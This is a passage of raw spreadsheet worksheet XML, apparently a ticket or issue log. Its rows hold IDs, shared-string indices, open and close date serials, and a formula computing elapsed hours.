        <v>43486.015300925923</v>
      </c>
      <c r="G825" t="s">
        <v>483</v>
      </c>
      <c r="H825" t="str">
        <f>TEXT(F825-E825,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="826" spans="1:8">
      <c r="A826" t="s">
        <v>2589</v>
      </c>
      <c r="B826">
        <v>12814</v>
      </c>
      <c r="C826" t="s">
        <v>2590</v>
      </c>
      <c r="D826" t="s">
        <v>7</v>
      </c>
      <c r="E826" s="1">
        <v>43485.795624999999</v>
      </c>
      <c r="F826" s="1">
        <v>43486.016527777778</v>
      </c>
      <c r="G826" t="s">
        <v>16</v>
      </c>
      <c r="H826" t="str">
        <f>TEXT(F826-E826,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="827" spans="1:8">
      <c r="A827" t="s">
        <v>2600</v>
      </c>
      <c r="B827">
        <v>12810</v>
      </c>
      <c r="C827" t="s">
        <v>2601</v>
      </c>
      <c r="D827" t="s">
        <v>7</v>
      </c>
      <c r="E827" s="1">
        <v>43485.750694444447</v>
      </c>
      <c r="F827" s="1">
        <v>43485.885497685187</v>
      </c>
      <c r="G827" t="s">
        <v>98</v>
      </c>
      <c r="H827" t="str">
        <f>TEXT(F827-E827,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="828" spans="1:8">
      <c r="A828" t="s">
        <v>2593</v>
      </c>
      <c r="B828">
        <v>12807</v>
      </c>
      <c r="C828" t="s">
        <v>2594</v>
      </c>
      <c r="D828" t="s">
        <v>7</v>
      </c>
      <c r="E828" s="1">
        <v>43485.600300925929</v>
      </c>
      <c r="F828" s="1">
        <v>43485.78802083333</v>
      </c>
      <c r="G828" t="s">
        <v>2595</v>
      </c>
      <c r="H828" t="str">
        <f>TEXT(F828-E828,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="829" spans="1:8">
      <c r="A829" t="s">
        <v>2606</v>
      </c>
      <c r="B829">
        <v>12806</v>
      </c>
      <c r="C829" t="s">
        <v>2607</v>
      </c>
      <c r="D829" t="s">
        <v>7</v>
      </c>
      <c r="E829" s="1">
        <v>43485.595370370371</v>
      </c>
      <c r="F829" s="1">
        <v>43486.016527777778</v>
      </c>
      <c r="G829" t="s">
        <v>25</v>
      </c>
      <c r="H829" t="str">
        <f>TEXT(F829-E829,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="830" spans="1:8">
      <c r="A830" t="s">
        <v>2596</v>
      </c>
      <c r="B830">
        <v>12805</v>
      </c>
      <c r="C830" t="s">
        <v>2597</v>
      </c>
      <c r="D830" t="s">
        <v>7</v>
      </c>
      <c r="E830" s="1">
        <v>43485.354618055557</v>
      </c>
      <c r="F830" s="1">
        <v>43485.720636574071</v>
      </c>
      <c r="G830" t="s">
        <v>16</v>
      </c>
      <c r="H830" t="str">
        <f>TEXT(F830-E830,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="831" spans="1:8" hidden="1">
      <c r="A831" t="s">
        <v>2608</v>
      </c>
      <c r="B831">
        <v>12801</v>
      </c>
      <c r="C831" t="s">
        <v>2609</v>
      </c>
      <c r="D831" t="s">
        <v>7</v>
      </c>
      <c r="E831" s="1">
        <v>43484.053611111114</v>
      </c>
      <c r="F831" s="1">
        <v>43630.015972222223</v>
      </c>
      <c r="G831" t="s">
        <v>2610</v>
      </c>
      <c r="H831" t="str">
        <f>TEXT(F831-E831,"[h]")</f>
        <v>3503</v>
      </c>
    </row>
    <row r="832" spans="1:8" hidden="1">
      <c r="A832" t="s">
        <v>2611</v>
      </c>
      <c r="B832">
        <v>12800</v>
      </c>
      <c r="C832" t="s">
        <v>2612</v>
      </c>
      <c r="D832" t="s">
        <v>7</v>
      </c>
      <c r="E832" s="1">
        <v>43483.913842592592</v>
      </c>
      <c r="F832" s="1">
        <v>43487.713773148149</v>
      </c>
      <c r="G832" t="s">
        <v>2054</v>
      </c>
      <c r="H832" t="str">
        <f>TEXT(F832-E832,"[h]")</f>
        <v>91</v>
      </c>
    </row>
    <row r="833" spans="1:8">
      <c r="A833" t="s">
        <v>2613</v>
      </c>
      <c r="B833">
        <v>12797</v>
      </c>
      <c r="C833" t="s">
        <v>2614</v>
      </c>
      <c r="D833" t="s">
        <v>7</v>
      </c>
      <c r="E833" s="1">
        <v>43483.807442129626</v>
      </c>
      <c r="F833" s="1">
        <v>43754.019768518519</v>
      </c>
      <c r="G833" t="s">
        <v>849</v>
      </c>
      <c r="H833" t="str">
        <f>TEXT(F833-E833,"[h]")</f>
        <v>6485</v>
      </c>
    </row>
    <row r="834" spans="1:8" hidden="1">
      <c r="A834" t="s">
        <v>2615</v>
      </c>
      <c r="B834">
        <v>12796</v>
      </c>
      <c r="C834" t="s">
        <v>2616</v>
      </c>
      <c r="D834" t="s">
        <v>7</v>
      </c>
      <c r="E834" s="1">
        <v>43483.638506944444</v>
      </c>
      <c r="F834" s="1">
        <v>43485.78802083333</v>
      </c>
      <c r="G834" t="s">
        <v>1849</v>
      </c>
      <c r="H834" t="str">
        <f>TEXT(F834-E834,"[h]")</f>
        <v>51</v>
      </c>
    </row>
    <row r="835" spans="1:8" hidden="1">
      <c r="A835" t="s">
        <v>2617</v>
      </c>
      <c r="B835">
        <v>12795</v>
      </c>
      <c r="C835" t="s">
        <v>2618</v>
      </c>
      <c r="D835" t="s">
        <v>7</v>
      </c>
      <c r="E835" s="1">
        <v>43483.571782407409</v>
      </c>
      <c r="F835" s="1">
        <v>43483.59920138889</v>
      </c>
      <c r="G835" t="s">
        <v>886</v>
      </c>
      <c r="H835" t="str">
        <f>TEXT(F835-E835,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="836" spans="1:8" hidden="1">
      <c r="A836" t="s">
        <v>2619</v>
      </c>
      <c r="B836">
        <v>12794</v>
      </c>
      <c r="C836" t="s">
        <v>2620</v>
      </c>
      <c r="D836" t="s">
        <v>7</v>
      </c>
      <c r="E836" s="1">
        <v>43483.554560185185</v>
      </c>
      <c r="F836" s="1">
        <v>43484.636469907404</v>
      </c>
      <c r="G836" t="s">
        <v>304</v>
      </c>
      <c r="H836" t="str">
        <f>TEXT(F836-E836,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="837" spans="1:8" hidden="1">
      <c r="A837" t="s">
        <v>2621</v>
      </c>
      <c r="B837">
        <v>12793</v>
      </c>
      <c r="C837" t="s">
        <v>2622</v>
      </c>
      <c r="D837" t="s">
        <v>7</v>
      </c>
      <c r="E837" s="1">
        <v>43483.465011574073</v>
      </c>
      <c r="F837" s="1">
        <v>43489.987951388888</v>
      </c>
      <c r="G837" t="s">
        <v>109</v>
      </c>
      <c r="H837" t="str">
        <f>TEXT(F837-E837,"[h]")</f>
        <v>156</v>
      </c>
    </row>
    <row r="838" spans="1:8" hidden="1">
      <c r="A838" t="s">
        <v>2623</v>
      </c>
      <c r="B838">
        <v>12792</v>
      </c>
      <c r="C838" t="s">
        <v>2624</v>
      </c>
      <c r="D838" t="s">
        <v>7</v>
      </c>
      <c r="E838" s="1">
        <v>43483.357662037037</v>
      </c>
      <c r="F838" s="1">
        <v>43486.381331018521</v>
      </c>
      <c r="G838" t="s">
        <v>1587</v>
      </c>
      <c r="H838" t="str">
        <f>TEXT(F838-E838,"[h]")</f>
        <v>72</v>
      </c>
    </row>
    <row r="839" spans="1:8" hidden="1">
      <c r="A839" t="s">
        <v>2625</v>
      </c>
      <c r="B839">
        <v>12791</v>
      </c>
      <c r="C839" t="s">
        <v>2626</v>
      </c>
      <c r="D839" t="s">
        <v>7</v>
      </c>
      <c r="E839" s="1">
        <v>43483.068437499998</v>
      </c>
      <c r="F839" s="1">
        <v>43486.276990740742</v>
      </c>
      <c r="G839" t="s">
        <v>109</v>
      </c>
      <c r="H839" t="str">
        <f>TEXT(F839-E839,"[h]")</f>
        <v>77</v>
      </c>
    </row>
    <row r="840" spans="1:8" hidden="1">
      <c r="A840" t="s">
        <v>2627</v>
      </c>
      <c r="B840">
        <v>12790</v>
      </c>
      <c r="C840" t="s">
        <v>2628</v>
      </c>
      <c r="D840" t="s">
        <v>7</v>
      </c>
      <c r="E840" s="1">
        <v>43483.06722222222</v>
      </c>
      <c r="F840" s="1">
        <v>43609.742442129631</v>
      </c>
      <c r="G840" t="s">
        <v>461</v>
      </c>
      <c r="H840" t="str">
        <f>TEXT(F840-E840,"[h]")</f>
        <v>3040</v>
      </c>
    </row>
    <row r="841" spans="1:8" hidden="1">
      <c r="A841" t="s">
        <v>2629</v>
      </c>
      <c r="B841">
        <v>12789</v>
      </c>
      <c r="C841" t="s">
        <v>2630</v>
      </c>
      <c r="D841" t="s">
        <v>7</v>
      </c>
      <c r="E841" s="1">
        <v>43482.987928240742</v>
      </c>
      <c r="F841" s="1">
        <v>43510.804965277777</v>
      </c>
      <c r="G841" t="s">
        <v>2631</v>
      </c>
      <c r="H841" t="str">
        <f>TEXT(F841-E841,"[h]")</f>
        <v>667</v>
      </c>
    </row>
    <row r="842" spans="1:8" hidden="1">
      <c r="A842" t="s">
        <v>2632</v>
      </c>
      <c r="B842">
        <v>12788</v>
      </c>
      <c r="C842" t="s">
        <v>2633</v>
      </c>
      <c r="D842" t="s">
        <v>7</v>
      </c>
      <c r="E842" s="1">
        <v>43482.987199074072</v>
      </c>
      <c r="F842" s="1">
        <v>43483.569571759261</v>
      </c>
      <c r="G842" t="s">
        <v>2634</v>
      </c>
      <c r="H842" t="str">
        <f>TEXT(F842-E842,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="843" spans="1:8" hidden="1">
      <c r="A843" t="s">
        <v>2635</v>
      </c>
      <c r="B843">
        <v>12787</v>
      </c>
      <c r="C843" t="s">
        <v>2636</v>
      </c>
      <c r="D843" t="s">
        <v>7</v>
      </c>
      <c r="E843" s="1">
        <v>43482.865624999999</v>
      </c>
      <c r="F843" s="1">
        <v>43482.978877314818</v>
      </c>
      <c r="G843" t="s">
        <v>852</v>
      </c>
      <c r="H843" t="str">
        <f>TEXT(F843-E843,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="844" spans="1:8">
      <c r="A844" t="s">
        <v>2637</v>
      </c>
      <c r="B844">
        <v>12786</v>
      </c>
      <c r="C844" t="s">
        <v>2638</v>
      </c>
      <c r="D844" t="s">
        <v>7</v>
      </c>
      <c r="E844" s="1">
        <v>43482.727824074071</v>
      </c>
      <c r="F844" s="1">
        <v>43623.281319444446</v>
      </c>
      <c r="G844" t="s">
        <v>2639</v>
      </c>
      <c r="H844" t="str">
        <f>TEXT(F844-E844,"[h]")</f>
        <v>3373</v>
      </c>
    </row>
    <row r="845" spans="1:8">
      <c r="A845" t="s">
        <v>2640</v>
      </c>
      <c r="B845">
        <v>12785</v>
      </c>
      <c r="C845" t="s">
        <v>2641</v>
      </c>
      <c r="D845" t="s">
        <v>7</v>
      </c>
      <c r="E845" s="1">
        <v>43482.702881944446</v>
      </c>
      <c r="F845" s="1">
        <v>43483.572893518518</v>
      </c>
      <c r="G845" t="s">
        <v>123</v>
      </c>
      <c r="H845" t="str">
        <f>TEXT(F845-E845,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="846" spans="1:8" hidden="1">
      <c r="A846" t="s">
        <v>2644</v>
      </c>
      <c r="B846">
        <v>12783</v>
      </c>
      <c r="C846" t="s">
        <v>2645</v>
      </c>
      <c r="D846" t="s">
        <v>7</v>
      </c>
      <c r="E846" s="1">
        <v>43482.699490740742</v>
      </c>
      <c r="F846" s="1">
        <v>43483.741273148145</v>
      </c>
      <c r="G846" t="s">
        <v>66</v>
      </c>
      <c r="H846" t="str">
        <f>TEXT(F846-E846,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="847" spans="1:8" hidden="1">
      <c r="A847" t="s">
        <v>2650</v>
      </c>
      <c r="B847">
        <v>12779</v>
      </c>
      <c r="C847" t="s">
        <v>2651</v>
      </c>
      <c r="D847" t="s">
        <v>7</v>
      </c>
      <c r="E847" s="1">
        <v>43482.349826388891</v>
      </c>
      <c r="F847" s="1">
        <v>43489.30972222222</v>
      </c>
      <c r="G847" t="s">
        <v>43</v>
      </c>
      <c r="H847" t="str">
        <f>TEXT(F847-E847,"[h]")</f>
        <v>167</v>
      </c>
    </row>
    <row r="848" spans="1:8" hidden="1">
      <c r="A848" t="s">
        <v>2652</v>
      </c>
      <c r="B848">
        <v>12777</v>
      </c>
      <c r="C848" t="s">
        <v>2653</v>
      </c>
      <c r="D848" t="s">
        <v>7</v>
      </c>
      <c r="E848" s="1">
        <v>43482.197627314818</v>
      </c>
      <c r="F848" s="1">
        <v>43482.681759259256</v>
      </c>
      <c r="G848" t="s">
        <v>2654</v>
      </c>
      <c r="H848" t="str">
        <f>TEXT(F848-E848,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="849" spans="1:8" hidden="1">
      <c r="A849" t="s">
        <v>2659</v>
      </c>
      <c r="B849">
        <v>12773</v>
      </c>
      <c r="C849" t="s">
        <v>2660</v>
      </c>
      <c r="D849" t="s">
        <v>7</v>
      </c>
      <c r="E849" s="1">
        <v>43482.009756944448</v>
      </c>
      <c r="F849" s="1">
        <v>43482.154398148145</v>
      </c>
      <c r="G849" t="s">
        <v>2661</v>
      </c>
      <c r="H849" t="str">
        <f>TEXT(F849-E849,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="850" spans="1:8" hidden="1">
      <c r="A850" t="s">
        <v>2666</v>
      </c>
      <c r="B850">
        <v>12770</v>
      </c>
      <c r="C850" t="s">
        <v>2667</v>
      </c>
      <c r="D850" t="s">
        <v>7</v>
      </c>
      <c r="E850" s="1">
        <v>43481.995451388888</v>
      </c>
      <c r="F850" s="1">
        <v>43496.724814814814</v>
      </c>
      <c r="G850" t="s">
        <v>2579</v>
      </c>
      <c r="H850" t="str">
        <f>TEXT(F850-E850,"[h]")</f>
        <v>353</v>
      </c>
    </row>
    <row r="851" spans="1:8" hidden="1">
      <c r="A851" t="s">
        <v>2668</v>
      </c>
      <c r="B851">
        <v>12769</v>
      </c>
      <c r="C851" t="s">
        <v>2669</v>
      </c>
      <c r="D851" t="s">
        <v>7</v>
      </c>
      <c r="E851" s="1">
        <v>43481.986724537041</v>
      </c>
      <c r="F851" s="1">
        <v>43482.153703703705</v>
      </c>
      <c r="G851" t="s">
        <v>2670</v>
      </c>
      <c r="H851" t="str">
        <f>TEXT(F851-E851,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="852" spans="1:8" hidden="1">
      <c r="A852" t="s">
        <v>2671</v>
      </c>
      <c r="B852">
        <v>12768</v>
      </c>
      <c r="C852" t="s">
        <v>2672</v>
      </c>
      <c r="D852" t="s">
        <v>7</v>
      </c>
      <c r="E852" s="1">
        <v>43481.978958333333</v>
      </c>
      <c r="F852" s="1">
        <v>43482.153506944444</v>
      </c>
      <c r="G852" t="s">
        <v>2673</v>
      </c>
      <c r="H852" t="str">
        <f>TEXT(F852-E852,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="853" spans="1:8" hidden="1">
      <c r="A853" t="s">
        <v>2674</v>
      </c>
      <c r="B853">
        <v>12767</v>
      </c>
      <c r="C853" t="s">
        <v>2675</v>
      </c>
      <c r="D853" t="s">
        <v>7</v>
      </c>
      <c r="E853" s="1">
        <v>43481.974629629629</v>
      </c>
      <c r="F853" s="1">
        <v>43482.153310185182</v>
      </c>
      <c r="G853" t="s">
        <v>2676</v>
      </c>
      <c r="H853" t="str">
        <f>TEXT(F853-E853,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="854" spans="1:8" hidden="1">
      <c r="A854" t="s">
        <v>2677</v>
      </c>
      <c r="B854">
        <v>12766</v>
      </c>
      <c r="C854" t="s">
        <v>2678</v>
      </c>
      <c r="D854" t="s">
        <v>7</v>
      </c>
      <c r="E854" s="1">
        <v>43481.913171296299</v>
      </c>
      <c r="F854" s="1">
        <v>43483.741273148145</v>
      </c>
      <c r="G854" t="s">
        <v>66</v>
      </c>
      <c r="H854" t="str">
        <f>TEXT(F854-E854,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="855" spans="1:8" hidden="1">
      <c r="A855" t="s">
        <v>2679</v>
      </c>
      <c r="B855">
        <v>12765</v>
      </c>
      <c r="C855" t="s">
        <v>2680</v>
      </c>
      <c r="D855" t="s">
        <v>7</v>
      </c>
      <c r="E855" s="1">
        <v>43481.807928240742</v>
      </c>
      <c r="F855" s="1">
        <v>43481.834398148145</v>
      </c>
      <c r="G855" t="s">
        <v>174</v>
      </c>
      <c r="H855" t="str">
        <f>TEXT(F855-E855,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="856" spans="1:8">
      <c r="A856" t="s">
        <v>2681</v>
      </c>
      <c r="B856">
        <v>12763</v>
      </c>
      <c r="C856" t="s">
        <v>2682</v>
      </c>
      <c r="D856" t="s">
        <v>7</v>
      </c>
      <c r="E856" s="1">
        <v>43481.695254629631</v>
      </c>
      <c r="F856" s="1">
        <v>43496.255578703705</v>
      </c>
      <c r="G856" t="s">
        <v>16</v>
      </c>
      <c r="H856" t="str">
        <f>TEXT(F856-E856,"[h]")</f>
        <v>349</v>
      </c>
    </row>
    <row r="857" spans="1:8" hidden="1">
      <c r="A857" t="s">
        <v>2683</v>
      </c>
      <c r="B857">
        <v>12762</v>
      </c>
      <c r="C857" t="s">
        <v>2684</v>
      </c>
      <c r="D857" t="s">
        <v>7</v>
      </c>
      <c r="E857" s="1">
        <v>43481.579930555556</v>
      </c>
      <c r="F857" s="1">
        <v>43482.980925925927</v>
      </c>
      <c r="G857" t="s">
        <v>43</v>
      </c>
      <c r="H857" t="str">
        <f>TEXT(F857-E857,"[h]")</f>
        <v>33</v>
      </c>
    </row>
    <row r="858" spans="1:8" hidden="1">
      <c r="A858" t="s">
        <v>2685</v>
      </c>
      <c r="B858">
        <v>12760</v>
      </c>
      <c r="C858" t="s">
        <v>2686</v>
      </c>
      <c r="D858" t="s">
        <v>7</v>
      </c>
      <c r="E858" s="1">
        <v>43481.309398148151</v>
      </c>
      <c r="F858" s="1">
        <v>43481.455787037034</v>
      </c>
      <c r="G858" t="s">
        <v>2687</v>
      </c>
      <c r="H858" t="str">
        <f>TEXT(F858-E858,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="859" spans="1:8">
      <c r="A859" t="s">
        <v>2688</v>
      </c>
      <c r="B859">
        <v>12759</v>
      </c>
      <c r="C859" t="s">
        <v>2689</v>
      </c>
      <c r="D859" t="s">
        <v>7</v>
      </c>
      <c r="E859" s="1">
        <v>43481.108923611115</v>
      </c>
      <c r="F859" s="1">
        <v>43579.569571759261</v>
      </c>
      <c r="G859" t="s">
        <v>2690</v>
      </c>
      <c r="H859" t="str">
        <f>TEXT(F859-E859,"[h]")</f>
        <v>2363</v>
      </c>
    </row>
    <row r="860" spans="1:8">
      <c r="A860" t="s">
        <v>2691</v>
      </c>
      <c r="B860">
        <v>12754</v>
      </c>
      <c r="C860" t="s">
        <v>2692</v>
      </c>
      <c r="D860" t="s">
        <v>7</v>
      </c>
      <c r="E860" s="1">
        <v>43480.701006944444</v>
      </c>
      <c r="F860" s="1">
        <v>43486.971400462964</v>
      </c>
      <c r="G860" t="s">
        <v>22</v>
      </c>
      <c r="H860" t="str">
        <f>TEXT(F860-E860,"[h]")</f>
        <v>150</v>
      </c>
    </row>
    <row r="861" spans="1:8">
      <c r="A861" t="s">
        <v>2693</v>
      </c>
      <c r="B861">
        <v>12753</v>
      </c>
      <c r="C861" t="s">
        <v>2694</v>
      </c>
      <c r="D861" t="s">
        <v>7</v>
      </c>
      <c r="E861" s="1">
        <v>43480.669189814813</v>
      </c>
      <c r="F861" s="1">
        <v>43488.829108796293</v>
      </c>
      <c r="G861" t="s">
        <v>25</v>
      </c>
      <c r="H861" t="str">
        <f>TEXT(F861-E861,"[h]")</f>
        <v>195</v>
      </c>
    </row>
    <row r="862" spans="1:8">
      <c r="A862" t="s">
        <v>2695</v>
      </c>
      <c r="B862">
        <v>12749</v>
      </c>
      <c r="C862" t="s">
        <v>2696</v>
      </c>
      <c r="D862" t="s">
        <v>7</v>
      </c>
      <c r="E862" s="1">
        <v>43480.588263888887</v>
      </c>
      <c r="F862" s="1">
        <v>43487.011400462965</v>
      </c>
      <c r="G862" t="s">
        <v>875</v>
      </c>
      <c r="H862" t="str">
        <f>TEXT(F862-E862,"[h]")</f>
        <v>154</v>
      </c>
    </row>
    <row r="863" spans="1:8">
      <c r="A863" t="s">
        <v>2697</v>
      </c>
      <c r="B863">
        <v>12748</v>
      </c>
      <c r="C863" t="s">
        <v>2698</v>
      </c>
      <c r="D863" t="s">
        <v>7</v>
      </c>
      <c r="E863" s="1">
        <v>43480.582349537035</v>
      </c>
      <c r="F863" s="1">
        <v>43488.761967592596</v>
      </c>
      <c r="G863" t="s">
        <v>16</v>
      </c>
      <c r="H863" t="str">
        <f>TEXT(F863-E863,"[h]")</f>
        <v>196</v>
      </c>
    </row>
    <row r="864" spans="1:8" hidden="1">
      <c r="A864" t="s">
        <v>2699</v>
      </c>
      <c r="B864">
        <v>12746</v>
      </c>
      <c r="C864" t="s">
        <v>2700</v>
      </c>
      <c r="D864" t="s">
        <v>7</v>
      </c>
      <c r="E864" s="1">
        <v>43480.557546296295</v>
      </c>
      <c r="F864" s="1">
        <v>43480.779780092591</v>
      </c>
      <c r="G864" t="s">
        <v>204</v>
      </c>
      <c r="H864" t="str">
        <f>TEXT(F864-E864,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="865" spans="1:8">
      <c r="A865" t="s">
        <v>2701</v>
      </c>
      <c r="B865">
        <v>12745</v>
      </c>
      <c r="C865" t="s">
        <v>2702</v>
      </c>
      <c r="D865" t="s">
        <v>7</v>
      </c>
      <c r="E865" s="1">
        <v>43480.544421296298</v>
      </c>
      <c r="F865" s="1">
        <v>43488.761956018519</v>
      </c>
      <c r="G865" t="s">
        <v>16</v>
      </c>
      <c r="H865" t="str">
        <f>TEXT(F865-E865,"[h]")</f>
        <v>197</v>
      </c>
    </row>
    <row r="866" spans="1:8">
      <c r="A866" t="s">
        <v>2703</v>
      </c>
      <c r="B866">
        <v>12743</v>
      </c>
      <c r="C866" t="s">
        <v>2704</v>
      </c>
      <c r="D866" t="s">
        <v>7</v>
      </c>
      <c r="E866" s="1">
        <v>43480.307314814818</v>
      </c>
      <c r="F866" s="1">
        <v>43496.694201388891</v>
      </c>
      <c r="G866" t="s">
        <v>2705</v>
      </c>
      <c r="H866" t="str">
        <f>TEXT(F866-E866,"[h]")</f>
        <v>393</v>
      </c>
    </row>
    <row r="867" spans="1:8" hidden="1">
      <c r="A867" t="s">
        <v>2706</v>
      </c>
      <c r="B867">
        <v>12741</v>
      </c>
      <c r="C867" t="s">
        <v>2707</v>
      </c>
      <c r="D867" t="s">
        <v>7</v>
      </c>
      <c r="E867" s="1">
        <v>43480.060613425929</v>
      </c>
      <c r="F867" s="1">
        <v>43480.541064814817</v>
      </c>
      <c r="G867" t="s">
        <v>51</v>
      </c>
      <c r="H867" t="str">
        <f>TEXT(F867-E867,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="868" spans="1:8" hidden="1">
      <c r="A868" t="s">
        <v>2708</v>
      </c>
      <c r="B868">
        <v>12740</v>
      </c>
      <c r="C868" t="s">
        <v>2709</v>
      </c>
      <c r="D868" t="s">
        <v>7</v>
      </c>
      <c r="E868" s="1">
        <v>43480.008773148147</v>
      </c>
      <c r="F868" s="1">
        <v>43604.419016203705</v>
      </c>
      <c r="G868" t="s">
        <v>1757</v>
      </c>
      <c r="H868" t="str">
        <f>TEXT(F868-E868,"[h]")</f>
        <v>2985</v>
      </c>
    </row>
    <row r="869" spans="1:8" hidden="1">
      <c r="A869" t="s">
        <v>2710</v>
      </c>
      <c r="B869">
        <v>12737</v>
      </c>
      <c r="C869" t="s">
        <v>2711</v>
      </c>
      <c r="D869" t="s">
        <v>7</v>
      </c>
      <c r="E869" s="1">
        <v>43479.632395833331</v>
      </c>
      <c r="F869" s="1">
        <v>43479.654085648152</v>
      </c>
      <c r="G869" t="s">
        <v>2367</v>
      </c>
      <c r="H869" t="str">
        <f>TEXT(F869-E869,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="870" spans="1:8">
      <c r="A870" t="s">
        <v>2712</v>
      </c>
      <c r="B870">
        <v>12734</v>
      </c>
      <c r="C870" t="s">
        <v>2713</v>
      </c>
      <c r="D870" t="s">
        <v>7</v>
      </c>
      <c r="E870" s="1">
        <v>43479.441134259258</v>
      </c>
      <c r="F870" s="1">
        <v>43628.486018518517</v>
      </c>
      <c r="G870" t="s">
        <v>126</v>
      </c>
      <c r="H870" t="str">
        <f>TEXT(F870-E870,"[h]")</f>
        <v>3577</v>
      </c>
    </row>
    <row r="871" spans="1:8" hidden="1">
      <c r="A871" t="s">
        <v>2602</v>
      </c>
      <c r="B871">
        <v>12733</v>
      </c>
      <c r="C871" t="s">
        <v>2603</v>
      </c>
      <c r="D871" t="s">
        <v>7</v>
      </c>
      <c r="E871" s="1">
        <v>43479.329247685186</v>
      </c>
      <c r="F871" s="1">
        <v>43479.354988425926</v>
      </c>
      <c r="G871" t="s">
        <v>66</v>
      </c>
      <c r="H871" t="str">
        <f>TEXT(F871-E871,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="872" spans="1:8" hidden="1">
      <c r="A872" t="s">
        <v>2666</v>
      </c>
      <c r="B872">
        <v>12731</v>
      </c>
      <c r="C872" t="s">
        <v>2714</v>
      </c>
      <c r="D872" t="s">
        <v>7</v>
      </c>
      <c r="E872" s="1">
        <v>43479.14943287037</v>
      </c>
      <c r="F872" s="1">
        <v>43479.25582175926</v>
      </c>
      <c r="G872" t="s">
        <v>51</v>
      </c>
      <c r="H872" t="str">
        <f>TEXT(F872-E872,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="873" spans="1:8" hidden="1">
      <c r="A873" t="s">
        <v>2715</v>
      </c>
      <c r="B873">
        <v>12730</v>
      </c>
      <c r="C873" t="s">
        <v>2716</v>
      </c>
      <c r="D873" t="s">
        <v>7</v>
      </c>
      <c r="E873" s="1">
        <v>43479.103055555555</v>
      </c>
      <c r="F873" s="1">
        <v>43479.332824074074</v>
      </c>
      <c r="G873" t="s">
        <v>138</v>
      </c>
      <c r="H873" t="str">
        <f>TEXT(F873-E873,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="874" spans="1:8" hidden="1">
      <c r="A874" t="s">
        <v>2717</v>
      </c>
      <c r="B874">
        <v>12729</v>
      </c>
      <c r="C874" t="s">
        <v>2718</v>
      </c>
      <c r="D874" t="s">
        <v>7</v>
      </c>
      <c r="E874" s="1">
        <v>43478.841539351852</v>
      </c>
      <c r="F874" s="1">
        <v>43479.266932870371</v>
      </c>
      <c r="G874" t="s">
        <v>255</v>
      </c>
      <c r="H874" t="str">
        <f>TEXT(F874-E874,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="875" spans="1:8" hidden="1">
      <c r="A875" t="s">
        <v>2719</v>
      </c>
      <c r="B875">
        <v>12728</v>
      </c>
      <c r="C875" t="s">
        <v>2720</v>
      </c>
      <c r="D875" t="s">
        <v>7</v>
      </c>
      <c r="E875" s="1">
        <v>43478.825532407405</v>
      </c>
      <c r="F875" s="1">
        <v>43479.243194444447</v>
      </c>
      <c r="G875" t="s">
        <v>66</v>
      </c>
      <c r="H875" t="str">
        <f>TEXT(F875-E875,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="876" spans="1:8" hidden="1">
      <c r="A876" t="s">
        <v>2721</v>
      </c>
      <c r="B876">
        <v>12727</v>
      </c>
      <c r="C876" t="s">
        <v>2722</v>
      </c>
      <c r="D876" t="s">
        <v>7</v>
      </c>
      <c r="E876" s="1">
        <v>43478.811979166669</v>
      </c>
      <c r="F876" s="1">
        <v>43480.742002314815</v>
      </c>
      <c r="G876" t="s">
        <v>66</v>
      </c>
      <c r="H876" t="str">
        <f>TEXT(F876-E876,"[h]")</f>
        <v>46</v>
      </c>
    </row>
    <row r="877" spans="1:8" hidden="1">
      <c r="A877" t="s">
        <v>2723</v>
      </c>
      <c r="B877">
        <v>12724</v>
      </c>
      <c r="C877" t="s">
        <v>2724</v>
      </c>
      <c r="D877" t="s">
        <v>7</v>
      </c>
      <c r="E877" s="1">
        <v>43478.308483796296</v>
      </c>
      <c r="F877" s="1">
        <v>43478.810300925928</v>
      </c>
      <c r="G877" t="s">
        <v>1729</v>
      </c>
      <c r="H877" t="str">
        <f>TEXT(F877-E877,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="878" spans="1:8">
      <c r="A878" t="s">
        <v>2725</v>
      </c>
      <c r="B878">
        <v>12722</v>
      </c>
      <c r="C878" t="s">
        <v>2726</v>
      </c>
      <c r="D878" t="s">
        <v>7</v>
      </c>
      <c r="E878" s="1">
        <v>43477.662002314813</v>
      </c>
      <c r="F878" s="1">
        <v>43489.72415509259</v>
      </c>
      <c r="G878" t="s">
        <v>16</v>
      </c>
      <c r="H878" t="str">
        <f>TEXT(F878-E878,"[h]")</f>
        <v>289</v>
      </c>
    </row>
    <row r="879" spans="1:8" hidden="1">
      <c r="A879" t="s">
        <v>2728</v>
      </c>
      <c r="B879">
        <v>12716</v>
      </c>
      <c r="C879" t="s">
        <v>2729</v>
      </c>
      <c r="D879" t="s">
        <v>7</v>
      </c>
      <c r="E879" s="1">
        <v>43475.642974537041</v>
      </c>
      <c r="F879" s="1">
        <v>43476.499907407408</v>
      </c>
      <c r="G879" t="s">
        <v>831</v>
      </c>
      <c r="H879" t="str">
        <f>TEXT(F879-E879,"[h]")</f>
        <v>20</v>
      </c>
    </row>
